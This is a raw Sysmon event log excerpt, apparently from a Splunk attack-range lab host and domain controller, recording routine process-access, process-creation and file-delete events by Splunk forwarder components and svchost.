11:14:44.892{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221011Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.892{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221010Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.892{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221009Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.892{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221008Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.892{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221007Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.892{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221006Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.892{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221005Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.892{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1724-6216-0205-000000003902}2968C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221004Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.892{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1724-6216-0205-000000003902}2968C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221003Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.895{4F8D34B0-1724-6216-0205-000000003902}2968C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000221002Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.658{4F8D34B0-1724-6216-0105-000000003902}20602556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000221001Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.627{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F850500C44C6C5D8D961CDA787A0873,SHA256=F805FC4527EE57EB7BCD20B0EFB5C7DCF1648BF6B6B017CCE88A08DAC7F96A11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297150Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:44.342{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FB6441E9C3A457E907D28A551B3C960,SHA256=CBF95896C00B9E9FB8874333B51D6214A63E9FDB092D3B9E136470C614FBB6F4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221000Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.377{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1724-6216-0105-000000003902}2060C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220999Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.377{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220998Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.377{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220997Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.377{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220996Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.377{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220995Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.377{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220994Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.377{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220993Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.377{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220992Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.377{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220991Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.377{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220990Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.377{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1724-6216-0105-000000003902}2060C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220989Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.377{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1724-6216-0105-000000003902}2060C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220988Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.378{4F8D34B0-1724-6216-0105-000000003902}2060C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221018Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:45.642{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65C192D827161420A960B330A39A8932,SHA256=4858DFB9236FA83DF5CE3B20CAA43B553BD374CD6E5B1201EF7D0BCDDF9C484F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297151Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:45.357{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=566C805E252FBAB7893352CA805B1012,SHA256=C613E19B2762B0072A93C3779B696D9EC59911A5A9912797FC32D5E11F67FB18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221017Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:45.424{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program 